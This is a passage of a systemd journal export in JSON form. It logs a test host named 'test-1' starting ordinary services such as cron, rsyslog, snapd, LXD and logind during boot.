"_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : 
"../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on Open-iSCSI iscsid Socket.", "UNIT" : "iscsid.socket", "INVOCATION_ID" : "1eb0ced481574b02b745ff2eadecc1bc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817988812" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=302;b=e2b08827b5804427b422c10c84f1567e;m=2a6146e;t=5bd16df6993d5;x=9f850fb4e837414a", "__REALTIME_TIMESTAMP" : "1615280818721749", "__MONOTONIC_TIMESTAMP" : "44438638", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Discard unused blocks once a week.", "UNIT" : "fstrim.timer", "INVOCATION_ID" : "1d95b26b3cca4090b62056f0aa0ddd31", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817995335" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=303;b=e2b08827b5804427b422c10c84f1567e;m=2a61590;t=5bd16df6994f8;x=ea068fc4350924ac", "__REALTIME_TIMESTAMP" : "1615280818722040", "__MONOTONIC_TIMESTAMP" : "44438928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", 
"_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Timers.", "UNIT" : "timers.target", "INVOCATION_ID" : "ccb21092f05e4b53901c1b69f443bc17", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818001033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=304;b=e2b08827b5804427b422c10c84f1567e;m=2a6193f;t=5bd16df6998a6;x=1e56ba1aa417b00e", "__REALTIME_TIMESTAMP" : "1615280818722982", "__MONOTONIC_TIMESTAMP" : "44439871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started ACPI Events Check.", "UNIT" : "acpid.path", "INVOCATION_ID" : "acbb7e4d2bbf44f59c42342ed64de95e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818006228" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=305;b=e2b08827b5804427b422c10c84f1567e;m=2a61f82;t=5bd16df699ee9;x=263882fa93cf9e82", "__REALTIME_TIMESTAMP" : "1615280818724585", "__MONOTONIC_TIMESTAMP" : "44441474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "UNIT" : "paths.target", "INVOCATION_ID" : "611ff12fe3034976a9758296c68836c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818008176" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=306;b=e2b08827b5804427b422c10c84f1567e;m=2a620bf;t=5bd16df69a026;x=112078bc5e9c2d29", "__REALTIME_TIMESTAMP" : "1615280818724902", "__MONOTONIC_TIMESTAMP" : "44441791", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on ACPID Listen Socket.", "UNIT" : "acpid.socket", "INVOCATION_ID" : "d144781f5fc04753bab3d0ab003bc3b1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818010071" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=307;b=e2b08827b5804427b422c10c84f1567e;m=2a621ea;t=5bd16df69a151;x=2c6f3fd245ed1a90", "__REALTIME_TIMESTAMP" : "1615280818725201", "__MONOTONIC_TIMESTAMP" : "44442090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "MESSAGE" : "Started Availability of block devices.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818018341" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=308;b=e2b08827b5804427b422c10c84f1567e;m=2a6234f;t=5bd16df69a2b7;x=12dd4932c964faba", "__REALTIME_TIMESTAMP" : "1615280818725559", "__MONOTONIC_TIMESTAMP" : "44442447", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "MESSAGE" : "Listening on Socket activation for snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818023733" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=309;b=e2b08827b5804427b422c10c84f1567e;m=2a62561;t=5bd16df69a4c9;x=e23bc822a4dc114a", "__REALTIME_TIMESTAMP" : "1615280818726089", "__MONOTONIC_TIMESTAMP" : "44442977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "MESSAGE" : "Listening on LXD - unix socket.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818026729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30a;b=e2b08827b5804427b422c10c84f1567e;m=2a625c9;t=5bd16df69a530;x=fa87a3ac4fd2d1ff", "__REALTIME_TIMESTAMP" : "1615280818726192", "__MONOTONIC_TIMESTAMP" : "44443081", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" 
: "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "UNIT" : "sockets.target", "INVOCATION_ID" : "07a9deddd9d140e1853a06c0058677c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818034574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30b;b=e2b08827b5804427b422c10c84f1567e;m=2a6261a;t=5bd16df69a582;x=961e7e7821c825db", "__REALTIME_TIMESTAMP" : "1615280818726274", "__MONOTONIC_TIMESTAMP" : "44443162", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "UNIT" : "basic.target", "INVOCATION_ID" : "d287654c12884bad9dbb0b0de0e108f6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818042137" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30c;b=e2b08827b5804427b422c10c84f1567e;m=2a62688;t=5bd16df69a5f0;x=3dcf5fd1dcd7fd00", "__REALTIME_TIMESTAMP" : "1615280818726384", "__MONOTONIC_TIMESTAMP" : "44443272", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - container startup/shutdown...", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818047751" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30d;b=e2b08827b5804427b422c10c84f1567e;m=2a6290b;t=5bd16df69a873;x=d26f496ee754c981", "__REALTIME_TIMESTAMP" : "1615280818727027", "__MONOTONIC_TIMESTAMP" : "44443915", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Deferred execution scheduler.", "UNIT" : "atd.service", "INVOCATION_ID" : "1ebd91a7fefa4e53858a79ee62b15641", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818055768" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30e;b=e2b08827b5804427b422c10c84f1567e;m=2a62999;t=5bd16df69a901;x=bbd8fd3e43d9c647", "__REALTIME_TIMESTAMP" : "1615280818727169", 
"__MONOTONIC_TIMESTAMP" : "44444057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Regular background program processing daemon.", "UNIT" : "cron.service", "INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818064486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30f;b=e2b08827b5804427b422c10c84f1567e;m=2a629ee;t=5bd16df69a956;x=bfda37168b7b7553", "__REALTIME_TIMESTAMP" : "1615280818727254", "__MONOTONIC_TIMESTAMP" : "44444142", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Dispatcher daemon for systemd-networkd...", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : 
"83ebf910c7064affa22dd95766ea1937", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818074184" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=310;b=e2b08827b5804427b422c10c84f1567e;m=2a62a97;t=5bd16df69a9fe;x=449072b715fc5dc7", "__REALTIME_TIMESTAMP" : "1615280818727422", "__MONOTONIC_TIMESTAMP" : "44444311", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: automatic crash report generation...", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818083002" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=311;b=e2b08827b5804427b422c10c84f1567e;m=2a62b02;t=5bd16df69aa6a;x=54556e10ba188efd", "__REALTIME_TIMESTAMP" : "1615280818727530", "__MONOTONIC_TIMESTAMP" : "44444418", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started irqbalance daemon.", "UNIT" : "irqbalance.service", "INVOCATION_ID" : "1be2a31769ab44beb8244d37671930ea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818108770" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=312;b=e2b08827b5804427b422c10c84f1567e;m=2a62b8a;t=5bd16df69aaf1;x=fbcad028f3bb2848", "__REALTIME_TIMESTAMP" : "1615280818727665", "__MONOTONIC_TIMESTAMP" : "44444554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting System Logging Service...", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818117517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=313;b=e2b08827b5804427b422c10c84f1567e;m=2a63106;t=5bd16df69b06d;x=44466dd6d4bbe35a", "__REALTIME_TIMESTAMP" : "1615280818729069", "__MONOTONIC_TIMESTAMP" : "44445958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Login Service...", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818123449" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=314;b=e2b08827b5804427b422c10c84f1567e;m=2a63169;t=5bd16df69b0d1;x=2a228382b0220274", "__REALTIME_TIMESTAMP" : "1615280818729169", "__MONOTONIC_TIMESTAMP" : "44446057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Accounts Service...", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818132053" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=315;b=e2b08827b5804427b422c10c84f1567e;m=2a631b7;t=5bd16df69b11e;x=62f06e0e7556c3cb", "__REALTIME_TIMESTAMP" : "1615280818729246", "__MONOTONIC_TIMESTAMP" : "44446135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", 
"SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Pollinate to seed the pseudo random number generator...", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818137998" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=316;b=e2b08827b5804427b422c10c84f1567e;m=2a63203;t=5bd16df69b16a;x=d489302caa2261be", "__REALTIME_TIMESTAMP" : "1615280818729322", "__MONOTONIC_TIMESTAMP" : "44446211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" 